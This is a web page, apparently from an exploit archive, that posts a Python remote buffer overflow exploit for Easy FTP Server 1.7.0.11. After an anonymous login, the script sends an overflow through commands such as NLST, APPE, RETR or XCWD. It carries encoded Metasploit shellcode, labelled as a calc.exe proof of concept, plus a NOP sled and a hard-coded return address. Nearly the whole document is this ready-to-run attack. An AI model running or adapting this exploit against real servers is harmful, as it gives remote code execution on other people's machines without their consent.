Home / os / win7

EASYFTP BOF Vulnerabilities in NLST , NLST -al, APPE, RETR,

Posted on 10 August 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>EASYFTP BOF Vulnerabilities in NLST , NLST -al, APPE, RETR, SIZE, XCWD</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>======================================================================
EASYFTP BOF Vulnerabilities in NLST , NLST -al, APPE, RETR, SIZE, XCWD
======================================================================

# Exploit Title: Easy FTP Server v1.7.0.11 NLST , NLST -al, APPE, RETR , SIZE  and XCWD Commands Remote Buffer Overflow Exploit
# Date: 10/8/2010
# Author: Rabih Mohsen
# Software Link:http://code.google.com/p/easyftpsvr/downloads/detail?name=easyftp-server-1.7.0.11-cn.zip
# Version: 1.7.0.11
# Tested on: Windows XP SP3
# CVE:
 
import socket
import sys
 
buffersize = 272
 
# Buffer needed -&gt; 272 bytes
# Metasploit Shellcode PoC - Calc.exe [ 228 bytes ] [ shikata_ga_nai - 1 iteration ] [ badchars x00x0ax2fx5c ]
  
shellcode = (&quot;xdaxc0xd9x74x24xf4xbbxe6x9axc9x6dx5ax33xc9xb1&quot;
&quot;x33x31x5ax18x83xeaxfcx03x5axf2x78x3cx91x12xf5&quot;
&quot;xbfx6axe2x66x49x8fxd3xb4x2dxdbx41x09x25x89x69&quot;
&quot;xe2x6bx3axfax86xa3x4dx4bx2cx92x60x4cx80x1ax2e&quot;
&quot;x8ex82xe6x2dxc2x64xd6xfdx17x64x1fxe3xd7x34xc8&quot;
&quot;x6fx45xa9x7dx2dx55xc8x51x39xe5xb2xd4xfex91x08&quot;
&quot;xd6x2ex09x06x90xd6x22x40x01xe6xe7x92x7dxa1x8c&quot;
&quot;x61xf5x30x44xb8xf6x02xa8x17xc9xaax25x69x0dx0c&quot;
&quot;xd5x1cx65x6ex68x27xbex0cxb6xa2x23xb6x3dx14x80&quot;
&quot;x46x92xc3x43x44x5fx87x0cx49x5ex44x27x75xebx6b&quot;
&quot;xe8xffxafx4fx2cx5bx74xf1x75x01xdbx0ex65xedx84&quot;
&quot;xaaxedx1cxd1xcdxafx4ax24x5fxcax32x26x5fxd5x14&quot;
&quot;x4ex6ex5exfbx09x6fxb5xbfxe5x25x94x96x6dxe0x4c&quot;
&quot;xabxf0x13xbbxe8x0cx90x4ex91xebx88x3ax94xb0x0e&quot;
&quot;xd6xe4xa9xfaxd8x5bxcax2exbbx3ax58xb2x12xd8xd8&quot;
&quot;x51x6bx28&quot;)
 
eip = &quot;x91xC8x41x7E&quot; # CALL EDI - user32.dll
nopsled = &quot;x90&quot; * 16
 
payload = &quot;x90&quot; * (buffersize-(len(nopsled)+len(shellcode)))
 
# target, CMDS: anny of the &quot;NLST , NLST -al, APPE, RETR , SIZE  and XCWD&quot;
def GenericEasyFTPExploit(target, CMDS):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect = s.connect((target, 21))
    s.recv(1024)
    s.send('User anonymous
')
    s.recv(1024)
    s.send('PASS anonymous
')
    s.send(CMDS +nopsled+shellcode+payload+eip+'
')
    s.recv(1024)
    s.send('QUIT EASY ftp
')
    s.close()
 
target = sys.argv[1]
CMDS  =  sys.argv[2]
 
GenericEasyFTPExploit(target,CMDS)


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-10]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :